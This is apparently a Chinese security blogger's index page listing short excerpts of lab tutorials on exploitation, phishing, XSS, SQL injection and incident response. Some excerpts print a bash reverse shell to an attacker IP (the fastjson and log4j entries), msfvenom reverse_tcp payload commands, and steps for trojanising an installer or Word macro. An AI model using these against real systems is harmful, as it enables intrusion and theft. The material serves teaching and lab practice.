Cwillchris
一个安全人
展开
-
钓鱼邮件演练项目实战
它通常被用来伪造邮件,进行钓鱼、社工等操作,但是这种也是具有一定风险的,同时在这里提醒广大用户在收到邮件时,不要直接打开邮件,先看看邮件的域名以及头标题等信息是否正确,不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击!--data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送;--ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。1、swaks --to test@qq.com //测试邮箱的连通性;原创 2023-05-10 10:53:31 · 932 阅读 · 1 评论 -
开源蜜罐hfish安装及使用教程
最后,根据被攻击的情况,又区分了云端 IP 画像和本地 IP 画像在云端画像中,可以通过他的攻击行为判定他的威胁程度。会展示数据库内所有数据,呈现直观展示。HFish 的蜜饵在牵引攻击者的功能上增加了精确定位失陷能力,即每个蜜饵都是唯一的,攻击者入侵用户主机后,如果盗取蜜饵文件中的数据并从任意主机发起攻击,防守者仍能知道失陷源头在哪里。通过增加威胁检测引擎,支持规则检测,且支持上传自定义 yara 规则,系统自动化分析数据,判定攻击行为,丰富 IP 威胁判定,更清晰的感受攻击态势和攻击情况。原创 2023-04-10 15:46:58 · 1418 阅读 · 0 评论 -
fastjson1.2.24 反序列化漏洞原理、环境搭建、利用图
6、目标机获取HackerFile文件内容并执行,HackerFile文件包含反弹shenll命令(/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.3/5555 0>&1)1、kali(192.168.1.3)作为用户,访问目标机192.168.1.10:8090,并提交恶意数据rmi://192.168.1.3:6666。抓包修改请求方法为POST,最下面空一行添加{"name":"Cwillchris", "age":20},即可更新服务端的信息。原创 2023-03-17 11:06:50 · 615 阅读 · 0 评论 -
thinkphp5.0.23rce复现
其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。原创 2023-03-13 17:56:42 · 552 阅读 · 0 评论 -
log4j2漏洞原理详解、漏洞复现及漏洞利用
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。原创 2023-03-13 00:23:27 · 1348 阅读 · 0 评论 -
windows系统应急响应
2、推荐工具:Window 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。运行 Win+R,输入lusrmgr.msc 回车,通过本地用户和组的管理页面(或者“计算机管理”)的可以查看到隐藏账户。最后应急处置,当然是杀死进程并删除后门文件,执行命令taskkill /F /pid 1472。删除可疑用户,可以直接删除或用cmd命令net user hacker$ /del 删除。安装好LogParser后,cmd切换到LogParser安装目录,执行以下命令。原创 2022-09-29 17:43:38 · 2760 阅读 · 0 评论 -
kali自带——dirb网站目录爆破枚举
默认情况下,dirb 扫描以递归方式扫描目录。这意味着它扫描目录,然后遍历该目录以扫描更多子目录。但在某些情况下,如果时间不够,我们会将 dirb 设置为不递归扫描。这可以使用-r 参数来实现。基于字典的 Web 目录扫描工具 DIRB。作用,专门扫描/猜测 Web 站点下有哪些目录,发现潜在的渗透目标。-r Don't Search Recursively. 不要递归搜索;common.txt 被设置为目录遍历的默认单词列表。-o 将输出保存到磁盘。...原创 2022-08-18 14:49:17 · 5593 阅读 · 0 评论 -
最全Linux 应急响应-溯源-系统日志排查
黑客入侵系统后一般会将系统日志清空,以达到清理痕迹的作用,如果日志被黑客清空我们就无法通过日志来分析黑客入侵系统后都做了哪些事情,在很多情况下黑客在清理日志的时候都会忽略内存中的日志。将本次登录的命令写入命令历史文件中,命令不是使用了就立即写入到文件中的,会现在缓存中,用户退出登录时会自动写入文件,-w 命令可以立即写入,-c 命令可以清除当前缓存中的命令。创建),但若失败(例如在系统启动早期"/var"尚未挂载),则转而保存在 /run/log/journal 目录中(将会被自动按需创建)。...原创 2022-08-04 14:19:24 · 921 阅读 · 0 评论 -
暴力破解-破解 Apache BASIC 认证
可以看到 DVWA 的登录页面是存在 user_token 的,如果每次提交新密码时都使用同一个 token,服务器通常来说是不处理我们的请求的。把刚获取到的最新的有效 token 复制到递归搜索中,因为原数据包中的 token 在我们提取 token 的时候被使用了,所以这里需要设置一个有效的 token。添加关键词匹配admin,如果服务器返回的应答包中存在对应的关键词,则对该请求进行标记,用于验证是否成功,一般暴力破解选择的关键词:用户名、登录提示、页面特征。...原创 2022-08-03 09:38:27 · 370 阅读 · 0 评论 -
暴力破解ssh/rdp/mysql/smb服务
原因是echo会生成一个换行符,如果不需要换行符则需要使用-n参数,但是我们的字典文件中的密码是一行一行的也存在换行符,所以我们原始数据和结果都是添加了换行符的,但是最终的结果都会是正确的。注如果你登录win7中的用户名不是administrator,而是自己安装系统的时候创建的用户名,那就使用自己的帐号。Hydra对应的中文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包。暴力破解软件的要素IP,用户名,端口号,字典,调一下暴力破解的进程数加快速度。...原创 2022-08-02 15:28:47 · 698 阅读 · 0 评论 -
最新版web漏洞扫描工具AppScan\AWVS\Xray安装及使用教程
这就是被动扫描,被动扫描需要你人工访问web页面,然后在页面上提交各种参数,xray会帮你把所有的参数进行测试是否存在问题,爬虫自动扫描在没有爬到页面中的表单以及参数信息时就不会进行对应的测试。所以被动扫描可能更适合我们对网站进行测试,需要注意的是请勿在可能对目标服务器造成不可逆的影响的位置进行测试,比如删除某个资源文件的请求。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。...原创 2022-07-27 11:24:30 · 1000 阅读 · 0 评论 -
基于文件上传漏洞获得网站 shell 权限
FileUpload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。连接失败,由于文件包含,需要登录DVWA,在未登录的状态下,会导致连接不成功。文件包含,即通过php函数加载另一个文件中的php代码,此函数通常会获取所有文件内容进行执行,识别到php代码后会执行php代码。...原创 2022-07-26 11:54:15 · 1107 阅读 · 0 评论 -
文件上传绕过WAF的技巧大全
另外从上述方法中,若按你们的想法,会分成那些类型?我在这里统一划分为特性和WAF解析不当(PS下,我不是学术派,较口语化)i,特性包括系统特性,协议特性等等,比如上述中,大多数都属于协议的特性,因为FORM-DATA的协议十分松散;而解析不当,比如上述的第二种添加一个filename1,这种在正常情况下无法使用的,如果第0种,对特殊字符无法解析,归根到底也是WAF对内容解析的不当处理。突破6,在Content-Disposition后添加多个空格或者在form-data;...原创 2022-07-26 10:42:00 · 382 阅读 · 0 评论 -
SSRF详解及burp自动化检测SSRF
一、服务器端请求伪造简介1、 SSRF 服务器端请求伪造简介SSRF(Server-Side Request Forgery:服务器端请求伪造)通过篡改 HTTP 请求中的资源地址发送给服务器,服务器没有校验请求的合法性,服务器解析用户传递过来的请求,处理之后返回给用户。例如:(1) HTTP 请求:www.cwillchris.cn/xxx.php?image=http://www.baidu.com/free.jpg(2) 服务器接收到请求之后获取 http://www.baidu.com/free.j原创 2022-07-14 10:52:51 · 1013 阅读 · 0 评论 -
使用 CSRFTester 进行自动化探测 CSRF 漏洞
1、探测的目的探测的目的是:探测 web 应用程序是否具有防止 CSRF 的措施。如果 Web 应用程序的 HTTP 请求中没有对应的预防措施,那么很大程度上就确定存在 CSRF 漏洞2、自动化探测工具介绍实验环境:win7 虚拟机中步骤如下(1)启动 CSRFTester需要安装 JDK8,这个 JDK8 在前面安装 burpsuite 已经安装了。这里就不用安装了。(2)火狐浏览器设置代理(3)火狐访问DVWA,并登录,选择XSS(Store)(4)随便输入数据开启CSRF-Tester纪录切换到浏览器原创 2022-07-12 18:24:49 · 1519 阅读 · 2 评论 -
CSRF 伪造用户请求攻击详解
一、CSRF 原理1、CSRF 的简单理解假设用户已经保存某网站的登录信息,下次登录不需要认证,此时黑客构造一个访问该站点的链接并添加如:修改密码、转账等操作的参数,用户点击链接后,黑客构造的参数被执行。这就是最简单的CSRF 攻击方式。CSRF 攻击流程图如下:总结:必要条件-用户必须登录2、CSRF 实验环境centos DVWA 服务器 IP:192.168.98.66Kali Hacker IP:192.168.98.11Win7 被攻击方 IP:192.168.98.105注:被攻击方可以任意,主原创 2022-07-12 18:18:46 · 818 阅读 · 0 评论 -
编码在XSS中的应用
一、使用编码绕过过滤-进行 XSS 注入1、Stage #15 十六进制绕过Stage #15 地址: https://xssquiz.int21h.jp/stage__15.php?sid=bdebf58d6cee62495a283af53d445e874dcfcad0输入的信息会在页面下方的黑色文本框中显示。尝试直接注入 payload: ">alert(document.dodomainmain);输入的双引号和左右尖括号全部转义成了实体字符编码。使用十六进制进行绕...原创 2022-07-10 22:38:57 · 740 阅读 · 0 评论 -
使用burpsuite进行自动化测试XSS漏洞的两种方法
一、使用 burpsuite 进行自动化测试 XSS 漏洞我们使用之前搭建的DVWA靶机进行实验进入centos靶机,启动 apache 服务└─# systemctl start apache2进入kali拷贝 payload 字典到 root 目录下,字典可以使用 Kali 中自带的,也可以使用网上找的└─# cp /usr/share/wordlists/wfuzz/Injections/XSS.txt /root在火狐中访问: 192.168.98.66/DVWA-master/vulnerabil原创 2022-07-08 09:52:44 · 1591 阅读 · 0 评论 -
XSS challenges绕过防护策略进行 XSS 注入
闭合input 注入js标签闭合value 注入事件一、 Stage #5 限制输入长度的解决方式 Stage #5 地址: XSS Challenges (by yamagata21) - Stage #5F12查看源码代码中定了文本框,类型为 text,最多允许输入 15 个字符 我们尝试按顺序输入 26 个英文字母,输入了 15 个英文字母就不能继续输入了:abcdefghijklmno双击maxlength处,修改为150修改完成后即可继续输入字符。我们输入 XSS 攻击脚本:">a......原创 2022-07-05 17:14:02 · 255 阅读 · 0 评论 -
手工挖XSS漏洞
一、 无过滤的 XSS 注入 访问:https://xss-quiz.int21h.jp注:提示中的内容需要选中才会显示例1:首先看一下页面的逻辑结构 输入1,点Search,,显示找不到1F12查看代码,我们输入的 1被加载到页面中我们加载alert(document.domain);,然后F12 看一下它在代码中的位置。 (document.domain #该属性是一个只读的字符串,包含了载入当前文档的 web 服务器的主机名。 )输入alert(doc...原创 2022-06-30 00:01:22 · 560 阅读 · 0 评论 -
使用 setoolkit 伪造站点窃取用户信息
Setoolkit 是一个万能的社工工具(社会工程学工具集合)┌──(root Cwillchris)-[~]└─# setoolkit翻译成中文: 从菜单中选择:1)社会工程攻击2)渗透测试(快速通道)3)第三方模块4)更新社会工程师工具包5)更新 SET 配置6)帮助,积分和关于99)退出社会工程师工具包选择1菜单:1)矛网钓鱼攻击载体2)网站攻击载体3)传染媒介发生器4)创建有效负载和侦听器5)群发邮件攻击6)基于 Arduino 的攻击向量7)无线接入点攻击向量8)QRcode 生成器攻击向量9)P原创 2022-06-29 21:47:57 · 235 阅读 · 0 评论 -
使用beef劫持用户浏览器
BeEF( The Browser Exploitation Framework) 是由 Wade Alcorn(瓦德·奥尔康) 在 2006 年开始创建的,至今还在维护。是由 ruby 语言开发的专门针对浏览器攻击的框架。执行的过程,就像这种恶意弹窗:zombie(僵尸)即受害的浏览器。zombie 是被 hook(勾连)的,如果浏览器访问了有勾子(由 js 编写)的页面,就会被 hook,勾连的浏览器会执行初始代码返回一些信息,接着 zombie 会每隔一段 时间(默认为 1 秒)就会向 BeEF 服务原创 2022-06-29 21:45:33 · 381 阅读 · 0 评论 -
XX攻击——反射型 XSS 攻击劫持用户浏览器
我们先构建一个反射型的 XSS 攻击跳转到存在漏洞的页面。其实也可以在 DVWA 中直接进行攻击,但是我们处于演示目的构造了一个相对复杂的环境。window.onload = function() {var link=document.getElementsByTagName("a");for(j = 0; j < link.length; j++) {link[j].href="http://www.baidu.com";}}JavaScript 代码分析 window....原创 2022-06-29 21:43:26 · 290 阅读 · 0 评论 -
XSS 跨站脚本攻击
一、XSS 跨站脚本攻击1、Cookie概述(自行百度)2、使用 JavaScript 创建 CookieJavaScript 可以使用 document.cookie 属性来创建 、读取、及删除 cookie。例 1:JavaScript 中,创建 cookie 如下所示:document.cookie="username=John Doe";例 2:你还可以为 cookie 添加一个过期时间(以 UTC 或 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除:document.cookie=原创 2022-06-21 21:24:22 · 244 阅读 · 0 评论 -
SQL注入绕过详解和防护
一、 SQL 注入的绕过技术1、 大小写绕过如果过滤器通过关键字进行过滤并没有识别大小写 ,我们就可以使用大小写来进行绕过,因为 SQL 语句是不区分大小写的。原始语句SELECT * FROM users WHERE id='1' LIMIT 0,1大小写掺杂注入SELECT * FROM users WHERE id='1'And 1=1--+' LIMIT 0,1问题存在的原因是:过滤器过滤了正常的关键字,但是并没有对字符串进行处理。2、 注释绕过 Less-23打开sqli-labs靶机[root@原创 2022-06-15 16:42:32 · 516 阅读 · 0 评论 -
基于报错的 SQL 注入
超详细sql报错注入原理讲解原创 2022-06-04 16:06:19 · 134 阅读 · 0 评论 -
SQL 注入读写文件
SQL读写文件原理超详细讲解原创 2022-06-04 16:04:41 · 795 阅读 · 1 评论 -
SQL 注入-盲注
超详细盲注原理讲解原创 2022-06-04 16:02:24 · 308 阅读 · 0 评论 -
SQL注入——联合查询union
SQL注入之联合查询超详细原理讲解原创 2022-06-02 22:02:32 · 434 阅读 · 0 评论 -
SQL注入原理即sqli-labs搭建,sql注入简单实战
一、SQL注入概述1、SQL注入原理用户登录的基本 SQL 语句:select * from users where username = '用户输入的用户名' and password='用户输入的密码'用户输入的内容是可控的,例如我们可以在用户名中输入' or 1=1 --空格select * from users where username = '' or 1=1 --空格 'and password = '用户输入的密码'此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一原创 2022-06-01 15:11:15 · 400 阅读 · 0 评论 -
PHP 调用并执行 Linux 命令
PHP 调用并执行 Linux 命令原创 2022-06-01 00:09:37 · 2894 阅读 · 0 评论 -
PHP一句话木马深度详细剖析
PHP一句话木马原理分析原创 2022-06-01 00:05:26 · 1266 阅读 · 0 评论 -
GET 和 POST 的区别及留言板代码实现
一、表单介绍1、 表单的介绍 可以获取客户端的信息(数据),表单有各种各样的控件,输入框、复选框、按钮等。 表单的功能:交互功能表单的工作原理:浏览有表单的页面,填写必要的信息,之后单击某个提交按钮,对表单中的数据进 行验证,如果不符合制定的要求,提示验证没有通过,如果符合相应的要求,把数据提交到服务器端,数 据放入数据库里面。2、表单的结构语法:<form 属性=”属性值“>控件</form>3、表单的属性(1)name 表单的识别名原创 2022-05-29 21:32:08 · 582 阅读 · 0 评论 -
PHP 开发环境搭建及数据库增删改查
实验环境:centos7(192.168.98.66)实验步骤:1、LAMP环境搭建关闭防火墙并禁止开机启动[root@localhost ~]# systemctl disable --now firewalld注: disable #禁止开机自启动。--now #立即生效,添加该参数会立即停止firewalld 防火墙服务。 等效于下面两条命令:[root@localhost ~]# systemctl disable firewalld[root@local原创 2022-05-29 12:22:50 · 121 阅读 · 0 评论 -
制作隐藏后门渗透windows/centos/ubuntu
一、某软件捆绑恶意程序渗透windows实验环境:某软件安装包kali攻击机(192.168.98.30)win7目标机(192.168.98.35)blinding编译工具实验步骤:1、通过xshell上传blinding 、 SecureCRT-kg.exe 、 SecureCRT-kg.ico到kali机2、生成后门msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOS原创 2022-05-27 23:52:01 · 390 阅读 · 0 评论 -
使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透及建立永久后门
最详细永恒之蓝渗透和后渗透教程原创 2022-05-28 08:32:02 · 618 阅读 · 0 评论 -
利用宏感染 word 文档获取windows系统的 shell
利用宏感染 word 文档获取window的 shell 实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)office 2016实验步骤:1、生成后门msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex原创 2022-05-27 13:43:48 · 352 阅读 · 0 评论 -
基于 java 环境的漏洞利用获取 Windows系统shell
基于 java 环境的漏洞利用获取 shell 实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)jre-7u17-windows-i586.exe实验步骤:1、搭建java环境xshell上传jre-7u17-windows-i586.exe到win7安装都一直点下一步就可以2、 使用 java 模块 getshellmsfbd run //进入msfuse exploit/multi/brow原创 2022-05-27 13:39:59 · 408 阅读 · 0 评论 -
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境:kali攻击机(192.168.98.30)window目标机(192.168.98.35)CVE-2018-8174脚本实验步骤:1、xshell上传 CVE-2018-8174 的 EXP 到 Kali2、解压 CVE-2018-8174 并进入该目录3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问python2原创 2022-05-27 13:37:55 · 682 阅读 · 0 评论 -
MSF远程渗透windows主机
刚接触MSF的你本地已经学会了渗透,但是如何远程渗透,怎么做,今天教你,声明仅限教学1、环境准备准备好 kali linux (IP为192.168.98.30) Windows靶机(IP为192.168.98.150,可以是任意没有安装杀软的Windows机器,有兴趣的可以让不在一个局域网的朋友配合一下)2、申请免费公网隧道打开Sunny网 ,注册个账号按要求注册一个账号,然后登录然后先仔细看教程,先进行实名认证,需要pay认证费用,且通过支付宝实名认证(防..原创 2022-05-04 10:39:20 · 709 阅读 · 0 评论